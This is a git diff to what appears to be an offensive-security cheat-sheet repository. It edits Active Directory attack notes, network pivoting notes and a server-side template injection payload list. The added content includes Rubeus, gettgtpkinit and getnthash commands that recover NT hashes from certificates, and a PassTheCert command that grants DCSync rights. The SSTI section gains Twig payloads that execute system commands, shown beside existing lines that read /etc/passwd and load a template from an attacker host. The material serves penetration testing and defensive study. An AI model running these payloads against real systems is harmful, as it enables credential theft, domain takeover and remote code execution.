diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6af65bd..8d4e0b0 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -62,7 +62,6 @@ - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [Using impacket](#using-impacket) - [Using Rubeus](#using-rubeus) - - [UnPAC The Hash](#unpac-the-hash) - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes) - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes) - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) @@ -84,6 +83,7 @@ - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Pass-The-Certificate](#pass-the-certificate) + - [UnPAC The Hash](#unpac-the-hash) - [Shadow Credentials](#shadow-credentials) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing DNS Admins Group](#abusing-dns-admins-group) @@ -1915,21 +1915,6 @@ root@kali:~$ klist .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe ``` -### UnPAC The Hash - -* Windows - ```ps1 - # request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC. - C:/> Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show - ``` -* Linux - ```ps1 - # obtain a TGT by validating a PKINIT pre-authentication - $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" - - # use the session key to recover the NT hash - $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME' - ``` ### Capturing and cracking Net-NTLMv1/NTLMv1 hashes @@ -2516,6 +2501,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 #### Pass-The-Certificate +> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential" + * Windows ```ps1 # Information about a cert file @@ -2523,6 +2510,11 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 # From a Base64 PFX Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show + + # Grant DCSync rights to an user + ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid + # To restore + ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt ``` * Linux ```ps1 @@ -2534,8 +2526,30 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 # PFX certificate (file) + password (string, optionnal) gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # Using Certipy + certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain' + certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx" ``` +### UnPAC The Hash + +Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate. + +* Windows + ```ps1 + # Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC. + Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show + ``` +* Linux + ```ps1 + # Obtain a TGT by validating a PKINIT pre-authentication + $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # Use the session key to recover the NT hash + $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME' + ``` + ### Shadow Credentials diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 35db818..48b3358 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -20,6 +20,7 @@ * [RevSocks](#revsocks) * [plink](#plink) * [ngrok](#ngrok) +* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools) * [Basic Pivoting Types](#basic-pivoting-types) * [Listen - Listen](#listen---listen) * [Listen - Connect](#listen---connect) @@ -410,7 +411,39 @@ tar xvzf cloudflared-stable-linux-amd64.tgz # Expose accessible internal service to the internet ./cloudflared tunnel --url ://: ``` - + +## Capture a network trace with builtin tools + +* Windows (netsh) + ```ps1 + # start a capture use the netsh command. + netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384 + + # stop the trace + netsh trace stop + + # Event tracing can be also used across a reboots + netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384 + + # To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version. + etl2pcapng.exe c:\trace.etl c:\trace.pcapng + + # Use filters + netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384 + ``` +* Linux (tcpdump) + ```ps1 + sudo apt-get install tcpdump + tcpdump -w 0001.pcap -i eth0 + tcpdump -A -i eth0 + + # capture every TCP packet + tcpdump -i eth0 tcp + + # capture everything on port 22 + tcpdump -i eth0 port 22 + ``` + ## Basic Pivoting Types @@ -456,3 +489,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz * 🇫🇷 [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/) * [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) * [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory) +* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/) \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 79f9bfc..a9b4398 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -829,6 +829,9 @@ $output = $twig > render ( {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{['id']|filter('system')}} +{{[0]|reduce('system','id')}} +{{['id']|map('system')|join}} +{{['id',1]|sort('system')|join}} {{['cat\x20/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}} ```